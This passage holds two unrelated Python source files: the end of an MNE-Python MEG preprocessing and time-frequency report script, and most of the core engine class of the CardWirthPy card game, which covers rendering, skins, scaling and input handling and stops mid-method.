['Properties of component %02d' % e for e in ica.exclude], 'ICA', replace=True)
report.add_figs_to_section(ica.plot_overlay(eog_epochs.average()), 'Signal removed by ICA', 'ICA', replace=True)
# Create short epochs for evoked analysis
epochs = mne.Epochs(raw, *mne.events_from_annotations(raw), tmin=-0.2, tmax=0.5, reject=None, baseline=(-0.2, 0),
preload=True)
epochs_clean = ica.apply(epochs)
epochs_clean.save(fname.epochs, overwrite=True)
evoked = epochs_clean.average()
evoked.save(fname.evoked)
report.add_figs_to_section(epochs.average().plot_joint(times=[0.035, 0.1]),
['Evokeds without ICA (grads)', 'Evokeds without ICA (mags)'], 'Sensor level', replace=True)
report.add_figs_to_section(epochs_clean.average().plot_joint(times=[0.035, 0.1]),
['Evokeds after ICA (grads)', 'Evokeds after ICA (mags)'], 'Sensor level', replace=True)
# Create longer epochs for rhythmic analysis
epochs_long = mne.Epochs(raw, *mne.events_from_annotations(raw), tmin=-1.5, tmax=2, reject=None, baseline=None,
preload=True)
epochs_long = ica.apply(epochs_long)
epochs_long.save(fname.epochs_long, overwrite=True)
# Visualize spectral content of the longer repochs
freqs = np.logspace(np.log10(5), np.log10(40), 20)
epochs_tfr = mne.time_frequency.tfr_morlet(epochs_long, freqs, n_cycles=7, return_itc=False, n_jobs=n_jobs)
fig = epochs_tfr.plot_topo(baseline=(-1, 0), mode='logratio')
fig.set_size_inches((12, 12))
report.add_figs_to_section(fig, 'Time-frequency decomposition', 'Spectrum', replace=True)
report.add_figs_to_section(epochs_tfr.plot(picks=['MEG 1143'], baseline=(-1, 0), mode='logratio'), 'Time-frequency decomposition for MEG 1143', 'Spectrum', replace=True)
report.add_figs_to_section(epochs_tfr.plot(picks=['MEG 2033'], baseline=(-1, 0), mode='logratio'), 'Time-frequency decomposition for MEG 2033', 'Spectrum', replace=True)
report.save(fname.report, overwrite=True, open_browser=False)
report.save(fname.report_html, overwrite=True, open_browser=False)
|
python
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
import itertools
import time
import datetime
import threading
import traceback
import shutil
import re
import math
import wx
import pygame
from pygame.locals import MOUSEBUTTONDOWN, MOUSEBUTTONUP, KEYDOWN, KEYUP, USEREVENT
import cw
from cw.util import synclock
# build_exe.pyによって作られる一時モジュール
# cw.versioninfoからビルド時間の情報を得る
try:
import versioninfo
except ImportError:
versioninfo = None
class CWPyRunningError(Exception):
pass
class _Singleton(object):
"""継承専用クラス"""
def __new__(cls, *args, **kwargs):
if cls is _Singleton:
raise NotImplementedError("Can not create _Singleton instance.")
else:
instance = object.__new__(cls)
cls.__new__ = classmethod(lambda cls, *args, **kwargs: instance)
return cls.__new__(cls, *args, **kwargs)
class CWPy(_Singleton, threading.Thread):
def __init__(self, setting, frame=None):
if frame and not hasattr(self, "frame"):
threading.Thread.__init__(self)
self.rsrc = None
self.frame = frame # 親フレーム
# 互換性データベース
self.sct = cw.setting.ScenarioCompatibilityTable()
# バージョン判定等で使用するシステムクーポン
self.syscoupons = cw.setting.SystemCoupons()
self.ydata = None
self._running = False
self.init_pygame(setting)
def init_pygame(self, setting):
"""使用変数等はここ参照。"""
self.setting = setting # 設定
self.status = "Title"
self.update_titlebar()
self.expand_mode = setting.expandmode # 画面拡大条件
self.is_processing = False # シナリオ読込中か
self.is_debuggerprocessing = False # デバッガの処理が進行中か(宿の再ロードなど)
self.is_decompressing = False # アーカイブ展開中か
self.update_scaling = False # 画面スケール変更中か
# pygame初期化
fullscreen = self.setting.is_expanded and self.setting.expandmode == "FullScreen"
self.scr, self.scr_draw, self.scr_fullscreen, self.clock = cw.util.init(cw.SIZE_GAME, "", fullscreen, self.setting.soundfonts,
fullscreensize=self.frame.get_displaysize())
if fullscreen:
self.set_fullscreen(True)
# 背景
self.background = None
# ステータスバー
self.statusbar = None
# キー入力捕捉用インスタンス(キー入力は全てwx側で捕捉)
self.keyevent = cw.eventrelay.KeyEventRelay()
# Diceインスタンス(いろいろなランダム処理に使う)
self.dice = cw.dice.Dice()
# 宿データ
self.ydata = None
# シナリオデータorシステムデータ
self.sdata = None
self.classicdata = None
# 選択中宿のパス
self.yadodir = ""
self.tempdir = ""
# BattleEngineインスタンス
self.battle = None
# 勝利時イベント時エリアID
self.winevent_areaid = None
# メインループ中に各種入力イベントがあったかどうかフラグ
self.has_inputevent = False
# アニメーションカットフラグ
self.cut_animation = False
# 入力があるまでメニューカード表示を待つ
self.wait_showcards = False
# ダイアログ表示階層
self._showingdlg = 0
# カーテンスプライト表示中フラグ
self._curtained = False
# カードの選択可否
self.is_pcardsselectable = False
self.is_mcardsselectable = True
# 現在カードの表示・非表示アニメ中フラグ
self._dealing = False
# カード自動配置フラグ
self._autospread = True
# ゲームオーバフラグ(イベント終了処理時にチェック)
self._gameover = False
self._forcegameover = False
# 現在選択中スプライト(SelectableSprite)
self.selection = None
# Trueの間は選択中のスプライトのクリックを行えない
self.lock_menucards = False
# 選択中のメンバ以外の戦闘行動が表示されている時はTrue
self._show_allselectedcards = False
# パーティカード表示中フラグ
self.is_showparty = False
# バックログ表示中フラグ
self._is_showingbacklog = False
# カード操作用データ(CardHeader)
self.selectedheader = None
# デバッグモードかどうか
self.debug = self.setting.debug
# 選択中スキンのディレクトリ
self.skindir = self.setting.skindir
# 宿ロード直後であればTrue
self._clear_changed = False
# MusicInterfaceインスタンス
self.music = [None] * cw.bassplayer.MAX_BGM_CHANNELS
for i in xrange(cw.bassplayer.MAX_BGM_CHANNELS):
self.music[i] = cw.util.MusicInterface(i, int(self.setting.vol_master*100))
# 最後に再生した効果音(システム・シナリオの2種)
self.lastsound_scenario = [None] * cw.bassplayer.MAX_SOUND_CHANNELS
self.lastsound_system = None
# EventInterfaceインスタンス
self.event = cw.event.EventInterface()
# Spriteグループ
self.cardgrp = pygame.sprite.LayeredDirty()
self.pcards = []
self.mcards = []
self.mcards_expandspchars = set()
self.curtains = []
self.topgrp = pygame.sprite.LayeredDirty()
self.backloggrp = pygame.sprite.LayeredDirty()
self.sbargrp = pygame.sprite.LayeredDirty()
# 使用中カード
self.inusecards = []
self.guardcards = []
# 一時的に荷物袋から取り出して使用中のカード
self.card_takenouttemporarily = None
# エリアID
self.areaid = 1
# 特殊エリア移動前に保持しておく各種データ
self.pre_areaids = []
self.pre_mcards = []
self.pre_dialogs = []
# 各種入力イベント
self.mousein = (0, 0, 0)
self.mousepos = (-1, -1)
self.wxmousepos = (-1, -1)
self.mousemotion = False
self.keyin = ()
self.events = []
# list, index(キーボードでのカード選択に使う)
self.list = []
self.index = -1
# 方向キーやマウスホイールで選択が変更された瞬間のカーソルの位置
self.wheelmode_cursorpos = (-1, -1)
# メニューカードのフラグごとの辞書
self._mcardtable = {}
# イベント終了時にメニューカードのリストを
# 更新する必要がある場合はTrue
self._after_update_mcardlist = False
# クラシックなシナリオの再生中であればそのデータ
self.classicdata = None
# イベントハンドラ
self.eventhandler = cw.eventhandler.EventHandler()
self._log_handler = None # メッセージログ表示中のハンドラ
# 設定ダイアログのタブ位置
self.settingtab = 0
# 保存用のパーティ記録
# 解散エリアに入った時点で生成される
self._stored_partyrecord = None
# 対象消去によってメンバの位置を再計算する必要があるか
self._need_disposition = False
# シナリオごとのブレークポイント情報
self.breakpoint_table = {}
self._load_breakpoints()
# アニメーション中のスプライト
self.animations = set()
# 一時的に速度設定の無いカード速度を上書きする
# -1の時は無効
self.override_dealspeed = -1
# 一時的に全てのカード速度を上書きする
# -1の時は無効
self.force_dealspeed = -1
# JPDC撮影などで表示内容が変化するべきスプライト
self.file_updates = set()
# 背景の更新が発生しているか
self.file_updates_bg = False
# シナリオ選択ダイアログで選択されたシナリオ
self.selectedscenario = None
# アーカイヴを展開中のシナリオ
self.expanding = u""
# 展開の進捗情報
self.expanding_min = 0
self.expanding_max = 100
self.expanding_cur = 0
# 現在のカーソル名
self.cursor = ""
self.change_cursor(force=True)
# テキストログ
self.advlog = cw.advlog.AdventurerLogger()
# 遅延再描画を行う場合はTrue
self._lazy_draw = False
# 次の描画処理で再描画するべき領域
self._lazy_clip = None
# ゲーム状態を"Title"にセット
self.exec_func(self.startup, loadyado=True)
def set_fullscreen(self, fullscreen):
"""wx側ウィンドウのフルスクリーンモードを切り替える。"""
def func():
if self.frame.IsFullScreen() == fullscreen:
return
if sys.platform == "win32":
self.frame.ShowFullScreen(fullscreen)
else:
self.frame.SetMaxSize((-1, -1))
self.frame.SetMinSize((-1, -1))
self.frame.ShowFullScreen(fullscreen)
if fullscreen:
dsize = self.frame.get_displaysize()
self.frame.SetClientSize(dsize)
self.frame.panel.SetSize(dsize)
self.frame.SetMaxSize(self.frame.GetBestSize())
self.frame.SetMinSize(self.frame.GetBestSize())
else:
self.frame.SetClientSize(cw.wins(cw.SIZE_GAME))
self.frame.panel.SetSize(cw.wins(cw.SIZE_GAME))
self.frame.SetMaxSize(self.frame.GetBestSize())
self.frame.SetMinSize(self.frame.GetBestSize())
self.frame.exec_func(func)
def set_clientsize(self, size):
"""wx側ウィンドウの表示域サイズを設定する。"""
def func():
self.frame.SetClientSize(size)
self.frame.panel.SetSize(size)
self.frame.exec_func(func)
def _load_breakpoints(self):
"""シナリオごとのブレークポイント情報をロードする。
"""
if not os.path.isfile("Breakpoints.xml"):
return
data = cw.data.xml2element("Breakpoints.xml")
for e_sc in data:
if e_sc.tag <> "Breakpoints":
continue
scenario = e_sc.get("scenario", "")
author = e_sc.get("author", "")
key = (scenario, author)
bps = set()
for e in e_sc:
if e.tag <> "Breakpoint":
continue
if e.text:
bps.add(e.text)
self.breakpoint_table[key] = bps
def _save_breakpoints(self):
"""シナリオごとのブレークポイント情報を保存する。
"""
if isinstance(self.sdata, cw.data.ScenarioData):
self.sdata.save_breakpoints()
element = cw.data.make_element("AllBreakpoints")
for key, bps in self.breakpoint_table.iteritems():
scenario, author = key
e_sc = cw.data.make_element("Breakpoints", attrs={"scenario":scenario,
"author":author})
for bp in bps:
if bp:
e = cw.data.make_element("Breakpoint", bp)
e_sc.append(e)
if len(e_sc):
element.append(e_sc)
path = "Breakpoints.xml"
if len(element):
etree = cw.data.xml2etree(element=element)
etree.write(path)
elif os.path.isfile(path):
cw.util.remove(path)
def _init_resources(self):
try:
"""スキンが関わるリソースの初期化"""
self.init_fullscreenparams()
# リソース(辞書)
if self.rsrc:
self.rsrc.dispose()
rsrc = self.rsrc
self.rsrc = None
self.rsrc = cw.setting.Resource(self.setting)
# システム効果音(辞書)
self.sounds = self.rsrc.sounds
# その他のスキン付属効果音(辞書)
self.skinsounds = self.rsrc.skinsounds
# システムメッセージ(辞書)
self.msgs = self.rsrc.msgs
# アクションカードのデータ(CardHeader)
# スケールのみの変更ではリセットしない
if rsrc:
self.rsrc.actioncards = rsrc.actioncards
self.rsrc.backpackcards = rsrc.backpackcards
else:
self.rsrc.actioncards = self.rsrc.get_actioncards()
self.rsrc.backpackcards = self.rsrc.get_backpackcards()
# 背景スプライト
if not self.background:
self.background = cw.sprite.background.BackGround()
self._update_clip()
# ステータスバースプライト
if not self.statusbar:
self.statusbar = cw.sprite.statusbar.StatusBar()
# ステータスバークリップ
self.sbargrp.set_clip(self.statusbar.rect)
self.update_fullscreenbackground()
return True
except cw.setting.NoFontError:
def func():
s = (u"CardWirthPyの実行に必要なフォントがありません。\n"
u"Data/Font以下にフォントをインストールしてください。")
wx.MessageBox(s, u"メッセージ", wx.OK|wx.ICON_ERROR, cw.cwpy.frame)
cw.cwpy.frame.Destroy()
cw.cwpy.frame.exec_func(func)
return False
def init_sounds(self):
"""スキン付属の効果音を再読込する。"""
self.rsrc.init_sounds()
# システム効果音(辞書)
self.sounds = self.rsrc.sounds
# その他のスキン付属効果音(辞書)
self.skinsounds = self.rsrc.skinsounds
def _update_clip(self):
clip = pygame.Rect(cw.s((0, 0)), cw.s(cw.SIZE_AREA))
self.cardgrp.set_clip(clip)
self.topgrp.set_clip(clip)
self.backloggrp.set_clip(clip)
def update_skin(self, skindirname, changearea=True, restartop=True, afterfunc=None):
self.file_updates.clear()
if self.status == "Title" and restartop:
changearea = False
self.cardgrp.remove(self.mcards)
self.mcards = []
self.mcards_expandspchars.clear()
self.background.bgs = []
elif self.status == "GameOver":
changearea = False
changed = self.ydata and self.ydata.is_changed()
scedir = self.setting.get_scedir()
oldskindirname = self.setting.skindirname
self.setting.skindirname = skindirname
self.setting.init_skin()
if self.ydata:
self.ydata.set_skinname(skindirname, self.setting.skintype)
self.skindir = self.setting.skindir
oldskindir = cw.util.join_paths(u"Data/Skin", oldskindirname)
newskindir = cw.util.join_paths(u"Data/Skin", skindirname)
self.background.update_skin(oldskindir, newskindir)
def repl_cardimg(sprite):
if hasattr(sprite, "cardimg"):
for path in sprite.cardimg.paths:
if path.path.startswith(oldskindir):
path.path = path.path.replace(oldskindir, newskindir)
for sprite in self.get_pcards():
repl_cardimg(sprite)
if self.sdata:
self.sdata.update_skin()
if not self.is_battlestatus() and changearea and not (self.status == "Title" and self.topgrp.sprites()):
removed_mcards = []
for sprite in self.mcards[:]:
if not isinstance(sprite, cw.sprite.card.FriendCard):
self.cardgrp.remove(sprite)
self.mcards.remove(sprite)
self.mcards_expandspchars.discard(sprite)
if self.is_playingscenario():
self.sdata.change_data(self.areaid, data=self.sdata.data)
else:
self.sdata.change_data(self.areaid, data=None)
self.set_mcards(self.sdata.get_mcarddata(data=self.sdata.data), False, True, setautospread=True)
self.deal_cards()
if self.is_playingscenario():
self.background.reload(doanime=False, ttype=("None", "None"), redraw=False, nocheckvisible=True)
else:
self.background.load(self.sdata.get_bgdata(), False, ("None", "None"), redraw=False)
if not self.is_playingscenario():
self.sdata.start_event(keynum=1)
self.clear_selection()
if self.rsrc:
self.rsrc.dispose()
self.rsrc = None
def func():
assert self.rsrc
if afterfunc:
afterfunc()
if self.is_battlestatus() and self.battle:
for ccard in self.get_pcards("unreversed"):
ccard.deck.set(ccard)
if self.battle.is_ready():
ccard.decide_action()
for ccard in self.get_ecards("unreversed"):
ccard.deck.set(ccard)
if self.battle.is_ready():
ccard.decide_action()
for ccard in self.get_fcards():
ccard.deck.set(ccard)
if self.battle.is_ready():
ccard.decide_action()
self.update_titlebar()
if scedir <> self.setting.get_scedir():
self.setting.lastscenario = []
self.setting.lastscenariopath = u""
if self.ydata:
self.ydata._changed = changed
if self.status == "Title" and restartop:
# タイトル画面にいる場合はロゴ表示前まで戻す
if self.topgrp.sprites():
# アニメーション中なら中止してから戻す
self.exec_func(self.startup, loadyado=False)
raise cw.event.EffectBreakError()
else:
self.startup(loadyado=False)
else:
for music in self.music:
music.play(music.path, updatepredata=False)
self.update_scale(cw.UP_WIN, changearea, rsrconly=True, afterfunc=func)
def update_yadoinitial(self):
if not self.ydata or self.ydata.party or self.is_playingscenario():
return
if self.ydata.is_empty() and not self.ydata.is_changed():
if self.areaid == 1:
self.change_area(3)
else:
if self.areaid == 3:
self.change_area(1)
def update_titlebar(self):
"""タイトルバー文字列を更新する。"""
self.set_titlebar(self.create_title())
def create_title(self):
"""タイトルバー文字列を生成する。"""
s = self.setting.titleformat
d = self.get_titledic()
return cw.util.format_title(s, d)
def get_titledic(self, with_datetime=False, for_fname=False):
"""タイトルバー文字列生成用の情報を辞書で取得する。"""
vstr = []
for v in cw.APP_VERSION:
vstr.append(str(v))
vstr = u".".join(vstr)
d = { "application":cw.APP_NAME, "skin":self.setting.skinname, "version":vstr }
if versioninfo:
d["build"] = versioninfo.build_datetime
if self.ydata:
d["yado"] = self.ydata.name
if self.ydata.party:
d["party"] = self.ydata.party.name
if self.status.startswith("Scenario") or self.status == "GameOver":
sdata = self.ydata.losted_sdata if self.ydata and self.ydata.losted_sdata else self.sdata
d["scenario"] = sdata.name
d["author"] = sdata.author
d["path"] = sdata.fpath
d["file"] = os.path.basename(sdata.fpath)
versionhint = sdata.get_versionhint()
#PyLite todo nen
#d["scenario"] = self.sdata.name
#d["author"] = self.sdata.author
#d["path"] = self.sdata.fpath
#d["file"] = os.path.basename(self.sdata.fpath)
#versionhint = self.sdata.get_versionhint()
d["compatibility"] = self.sct.to_basehint(versionhint)
if with_datetime:
date = datetime.datetime.today()
d["date"] = date.strftime("%Y-%m-%d")
d["year"] = date.strftime("%Y")
d["month"] = date.strftime("%m")
d["day"] = date.strftime("%d")
d["time"] = date.strftime("%H:%M:%S")
d["hour"] = date.strftime("%H")
d["minute"] = date.strftime("%M")
d["second"] = date.strftime("%S")
d["millisecond"] = date.strftime("%f")[:3]
if for_fname:
d2 = {}
for key, value in d.iteritems():
value = value.replace(" ", "_")
value = value.replace(":", ".")
d2[key] = cw.binary.util.check_filename(value).strip()
return (d, d2)
else:
return d
def update_scale(self, scale, changearea=True, rsrconly=False, udpatedrawsize=True,
displaysize=None, afterfunc=None):
"""画面の表示倍率を変更する。
scale: 倍率。1は拡大しない。2で縦横2倍サイズの表示になる。
"""
fullscreen = self.is_expanded() and self.setting.expandmode == "FullScreen"
if displaysize is None and fullscreen:
def func():
dsize = self.frame.get_displaysize()
def func():
self.update_scale(scale, changearea, rsrconly, udpatedrawsize, dsize)
if afterfunc:
afterfunc()
self.exec_func(func)
self.frame.exec_func(func)
return
self.update_scaling = True
if self.ydata:
changed = self.ydata.is_changed()
else:
changed = False
resizewin = False
if not rsrconly:
cw.UP_SCR = scale
flags = 0
if fullscreen:
dsize = displaysize
self.scr_fullscreen = pygame.display.set_mode((dsize[0], dsize[1]), flags)
self.scr = pygame.Surface(cw.s(cw.SIZE_GAME)).convert()
self.scr_draw = self.scr
else:
self.scr_fullscreen = None
self.scr = pygame.display.set_mode(cw.wins(cw.SIZE_GAME), flags)
if cw.UP_SCR == cw.UP_WIN:
self.scr_draw = self.scr
else:
self.scr_draw = pygame.Surface(cw.s(cw.SIZE_GAME)).convert()
resizewin = True
if udpatedrawsize:
self._init_resources()
self.statusbar.update_scale()
self.sbargrp.set_clip(self.statusbar.rect)
if self.sdata:
self.sdata.update_scale()
if self.pre_mcards:
mcarddata = self.sdata.get_mcarddata(self.pre_areaids[-1][0], self.pre_areaids[-1][1])
self.pre_mcards[-1] = self.set_mcards(mcarddata, False, False)
self._update_clip()
cw.sprite.message.MessageWindow.clear_selections()
for sprite in self.cardgrp.sprites():
if sprite.is_initialized() and not isinstance(sprite, (cw.sprite.background.BackGround,
cw.sprite.background.BgCell))\
and not isinstance(sprite, cw.sprite.background.Curtain):
sprite.update_scale()
for sprite in self.topgrp.sprites():
sprite.update_scale()
for sprite in self.backloggrp.sprites():
sprite.update_scale()
for sprite in self.get_fcards():
sprite.update_scale()
for sprite in self.cardgrp.sprites():
if sprite.is_initialized() and isinstance(sprite, (cw.sprite.background.BackGround,
cw.sprite.background.BgCell))\
and not isinstance(sprite, cw.sprite.background.Curtain):
sprite.update_scale()
for sprite in self.cardgrp.sprites():
if isinstance(sprite, cw.sprite.background.Curtain) and\
isinstance(sprite.target, cw.sprite.card.CWPyCard):
sprite.update_scale()
self._update_clip()
for music in self.music:
music.update_scale()
else:
self.init_fullscreenparams()
self.update_fullscreenbackground()
cw.cwpy.frame.exec_func(self.rsrc.update_winscale)
if self.ydata:
self.ydata._changed = changed
self.clear_selection()
self.mousepos = (-1, -1)
if not self.is_showingdlg():
# 一度マウスポインタを画面外へ出さないと
# フォーカスを失うことがある
pos = pygame.mouse.get_pos()
pygame.mouse.set_pos([-1, -1])
pygame.mouse.set_pos(pos)
self.change_cursor(self.cursor, force=True)
self.update_scaling = False
if udpatedrawsize and not self.background.reload_jpdcimage and self.background.has_jpdcimage:
self.background.reload(False, ttype=(None, None))
if afterfunc:
afterfunc()
if changearea:
def func():
self.update()
self.draw()
self.exec_func(func)
if not rsrconly and not (self.setting.expandmode == "FullScreen" and self.is_expanded()):
def func():
self.set_clientsize(cw.wins(cw.SIZE_GAME))
self.exec_func(func)
def update_messagestyle(self):
"""メッセージの描画形式の変更を反映する。"""
cw.sprite.message.MessageWindow.clear_selections()
for sprite in itertools.chain(self.cardgrp.get_sprites_from_layer(cw.LAYER_MESSAGE),
self.cardgrp.get_sprites_from_layer(cw.LAYER_SPMESSAGE)):
sprite.update_scale()
if self._log_handler:
self._log_handler.update_sprites(clearcache=True)
def update_vocation120(self, vocation120):
"""適性表示を1.20に合わせる設定を変更する。"""
if self.setting.vocation120 <> vocation120:
self.setting.vocation120 = vocation120
for sprite in self.cardgrp.sprites():
if isinstance(sprite, cw.sprite.background.InuseCardImage) or\
(isinstance(sprite, cw.character.Character) and sprite.is_initialized() and sprite.test_aptitude):
sprite.update_scale()
def update_curtainstyle(self):
"""カーテンの描画形式の変更を反映する。"""
for sprite in itertools.chain(self.cardgrp.sprites(),
self.backloggrp.sprites(),
self.sbargrp.sprites()):
if isinstance(sprite, cw.sprite.message.BacklogCurtain):
sprite.color = self.setting.blcurtaincolour
sprite.update_scale()
elif isinstance(sprite, cw.sprite.background.Curtain):
sprite.color = self.setting.curtaincolour
sprite.update_scale()
def set_debug(self, debug):
self.setting.debug = debug
self.setting.debug_saved = debug
self.debug = debug
self.statusbar.change(not self.is_runningevent())
if self.is_battlestatus():
if self.battle:
self.battle.update_debug()
else:
for sprite in self.get_mcards():
sprite.update_scale()
if not debug and self.is_showingdebugger():
self.frame.exec_func(self.frame.debugger.Close)
if not self.is_decompressing:
cw.data.redraw_cards(debug)
self.clear_selection()
self.draw()
def update_infocard(self):
"""デバッガ等から所有情報カードの変更を
行った際に呼び出される。
"""
self.sdata.notice_infoview = True
showbuttons = not self.is_playingscenario() or\
(not self.areaid in cw.AREAS_TRADE and self.areaid in cw.AREAS_SP)
if self.is_battlestatus() and not self.battle.is_ready():
showbuttons = False
self.statusbar.change(showbuttons)
if self.areaid == cw.AREA_CAMP and self.is_playingscenario():
cw.data.redraw_cards(cw.cwpy.sdata.has_infocards())
def run(self):
try:
try:
self._run()
except CWPyRunningError:
self.quit()
except wx.PyDeadObjectError:
pass
self._quit()
except:
self.is_processing = False
self._running = False
if self.advlog:
self.advlog.enable(False)
# エラーログを出力
exc_type, exc_value, exc_traceback = sys.exc_info()
vstr = []
for v in cw.APP_VERSION:
vstr.append(str(v))
sys.stderr.write("Version : %s" % ".".join(vstr))
if versioninfo:
sys.stderr.write(" / %s" % (versioninfo.build_datetime))
sys.stderr.write("\n")
d = datetime.datetime.today()
sys.stderr.write(d.strftime("DateTime: %Y-%m-%d %H:%M:%S\n"))
traceback.print_exception(exc_type, exc_value, exc_traceback, file=sys.stderr)
sys.stderr.write("\n")
finally:
cw.util.clear_mutex()
def _run(self):
self._running = True
while self._running:
self.main_loop(True)
def main_loop(self, update):
if pygame.event.peek(USEREVENT):
self.input() # 各種入力イベント取得
self.eventhandler.run() # イベントを消化
else:
self.tick_clock() # FPS調整
self.input() # 各種入力イベント取得
self.eventhandler.run() # イベントハンドラ
if not pygame.event.peek(USEREVENT):
if update:
self.update() # スプライトの更新
self.draw(True) # スプライトの描画
if not self.is_runningevent() and self._clear_changed:
if self.ydata:
self.ydata._changed = False
self._clear_changed = False
def quit(self):
# トップフレームから閉じて終了。cw.frame.OnDestroy参照。
event = wx.PyCommandEvent(wx.wxEVT_DESTROY)
self.frame.AddPendingEvent(event)
def quit2(self):
self.ydata = None
event = wx.PyCommandEvent(wx.wxEVT_CLOSE_WINDOW)
self.frame.AddPendingEvent(event)
def _quit(self):
self.advlog.end_scenario(False, False)
for music in self.music:
music.stop()
for i in xrange(len(self.lastsound_scenario)):
if self.lastsound_scenario[i]:
self.lastsound_scenario[i].stop(True)
self.lastsound_scenario[i] = None
if self.lastsound_system:
self.lastsound_system.stop(False)
self.lastsound_system = None
pygame.quit()
cw.util.remove_temp()
self._save_breakpoints()
self.setting.write()
if self.rsrc:
self.rsrc.clear_systemfonttable()
def tick_clock(self, framerate=0):
if framerate:
self.clock.tick(framerate)
else:
self.clock.tick(self.setting.fps)
def wait_frame(self, count, canskip):
"""countフレーム分待機する。"""
self.event.eventtimer = 0
skip = False
for _i in xrange(count):
if canskip:
# リターンキー長押し, マウスボタンアップ, キーダウンで処理中断
if self.keyevent.is_keyin(pygame.locals.K_RETURN) or self.keyevent.is_mousein():
skip = True
break
sel = self.selection
self.sbargrp.update(cw.cwpy.scr_draw)
if sel <> self.selection:
cw.cwpy.draw(clip=self.statusbar.rect)
breakflag = self.get_breakflag(handle_wheel=cw.cwpy.setting.can_skipwait_with_wheel)
self.input(inputonly=True)
self.eventhandler.run()
if breakflag:
skip = True
break
self.tick_clock()
return skip
def get_breakflag(self, handle_wheel=True):
"""待機時間を飛ばすべき入力がある場合にTrueを返す。"""
if self.is_playingscenario() and self.sdata.in_f9:
return True
breakflag = False
self.keyevent.peek_mousestate()
events = pygame.event.get((pygame.locals.MOUSEBUTTONUP, pygame.locals.KEYUP))
for e in events:
if e.type in (pygame.locals.MOUSEBUTTONUP, pygame.locals.MOUSEBUTTONDOWN) and hasattr(e, "button"):
if not handle_wheel and e.button in (4, 5):
# ホイールによる空白時間スキップ無効の設定
continue
breakflag = True
elif e.type == pygame.locals.KEYUP:
if not e.key in (pygame.locals.K_F1, pygame.locals.K_F2, pygame.locals.K_F3, pygame.locals.K_F4,
pygame.locals.K_F5, pygame.locals.K_F6, pygame.locals.K_F7, pygame.locals.K_F8,
pygame.locals.K_F9, pygame.locals.K_F10, pygame.locals.K_F11, pygame.locals.K_F12,
pygame.locals.K_F13, pygame.locals.K_F14, pygame.locals.K_F15):
breakflag = True
cw.thread.post_pygameevent(e)
return breakflag
def get_nextevent(self):
# BUG: 稀にbuttonのないMOUSEBUTTONUPが発生するらしい(環境による?)
# そのため、buttonのないマウスイベントやkeyのないキーイベントが
# 発生していないかここでチェックし、そうしたイベントを無視する
while True:
if self.events:
e = self.events[0]
self.events = self.events[1:]
# ---
if e.type in (MOUSEBUTTONDOWN, MOUSEBUTTONUP) and not hasattr(e, "button"):
continue
elif e.type in (KEYDOWN, KEYUP) and not hasattr(e, "key"):
continue
elif e.type <> USEREVENT and self.is_showingdlg():
continue
# ---
return e
else:
return None
def clear_inputevents(self):
self.keyevent.peek_mousestate()
pygame.event.clear((MOUSEBUTTONDOWN, MOUSEBUTTONUP, KEYDOWN, KEYUP))
events = []
for e in self.events:
if not e.type in (MOUSEBUTTONDOWN, MOUSEBUTTONUP, KEYDOWN, KEYUP):
events.append(e)
self.events = events
def input(self, eventclear=False, inputonly=False, noinput=False):
if eventclear:
self.clear_inputevents()
return
self.keyevent.peek_mousestate()
self.proc_animation()
if not self.is_showingdlg():
if sys.platform == "win32":
self.mousein = pygame.mouse.get_pressed()
mousepos = self.mousepos
if self.update_mousepos():
# カーソルの移動を検出
mousemotion2 = self.mousepos <> mousepos
if self.wheelmode_cursorpos <> (-1, -1) and self.mousepos <> (-1, -1) and mousepos <> (-1, -1):
# 方向キーやホイールで選択を変更中は、マウスが多少ぶれても移動を検出しないようにする
# (元々の位置からの半径で検出)
ax, ay = self.wheelmode_cursorpos
bx, by = self.mousepos
self.mousemotion = self.setting.radius_notdetectmovement < abs(math.hypot(ax-bx, ay-by))
if self.mousemotion:
self.wheelmode_cursorpos = (-1, -1)
else:
self.mousemotion = mousemotion2
self.wheelmode_cursorpos = (-1, -1)
if self.mousemotion:
for i in xrange(len(self.keyevent.mousein)):
if not self.keyevent.mousein[i] in (0, -1):
# マウスポインタが動いた場合は連打開始までの待ち時間を延期する
# (-1はすでに連打状態)
self.keyevent.mousein[i] = pygame.time.get_ticks()
if self.setting.show_allselectedcards and not self.is_runningevent() and self.is_battlestatus() and self.battle.is_ready():
# パーティ領域より上へマウスカーソルが行ったら戦闘行動表示をクリア
if mousemotion2 and self._in_partyarea(mousepos) <> self._in_partyarea(self.mousepos):
self._show_allselectedcards = True
self.change_selection(self.selection)
self.draw()
self.keyin = self.keyevent.get_pressed()
if inputonly:
seq = []
for e in self.events:
if e.type in (MOUSEBUTTONDOWN, MOUSEBUTTONUP, KEYDOWN, KEYUP):
seq.append(e)
else:
cw.thread.post_pygameevent(e)
events = pygame.event.get((MOUSEBUTTONDOWN, MOUSEBUTTONUP, KEYDOWN, KEYUP))
if events:
events = [events[-1]]
seq.extend(events)
del self.events[:]
self.events.extend(seq)
else:
if noinput:
seq = []
for e in self.events:
if not e.type in (MOUSEBUTTONDOWN, MOUSEBUTTONUP, KEYDOWN, KEYUP):
seq.append(e)
del self.events[:]
self.events.extend(seq)
pygame.event.clear((MOUSEBUTTONDOWN, MOUSEBUTTONUP, KEYDOWN, KEYUP))
self.events.extend(pygame.event.get())
def _in_partyarea(self, mousepos):
return cw.s(290-5) <= mousepos[1] and mousepos[1] < cw.s(cw.SIZE_AREA[1])
def update_mousepos(self):
if pygame.mouse.get_focused():
if self.scr_fullscreen:
mousepos = pygame.mouse.get_pos()
x = int((mousepos[0] - self.scr_pos[0]) / self.scr_scale)
y = int((mousepos[1] - self.scr_pos[1]) / self.scr_scale)
self.mousepos = (x, y)
else:
self.mousepos = cw.mwin2scr_s(pygame.mouse.get_pos())
else:
self.mousepos = (-1, -1)
return True
def update(self):
if not self.statusbar:
return
assert not self.event.in_cardeffectmotion
# 状態の補正
if not self.statusbar.showbuttons:
# 通常エリアで操作可能な状態であればステータスバーのボタンを表示
if not self.is_runningevent() and not self.areaid in cw.AREAS_TRADE and not self.selectedheader:
self.statusbar.change()
self.draw()
if self.lock_menucards:
# 操作可能であればメニューカードのロックを解除
if not self.is_runningevent() and not self.is_showingdlg():
self.lock_menucards = False
cw.cwpy.frame.check_killlist()
# 一時カードはダイアログを開き直す直前に荷物袋へ戻すが、
# 戦闘突入等でダイアログを開き直せなかった場合はここで戻す
self.return_takenoutcard()
# JPDC撮影などで更新されたメニューカードと背景を更新する
self.fix_updated_file()
# パーティが非表示であれば表示する
if not self.is_runningevent():
if not self.is_showparty:
self.show_party()
if not cw.cwpy.sdata.infocards_beforeevent is None:
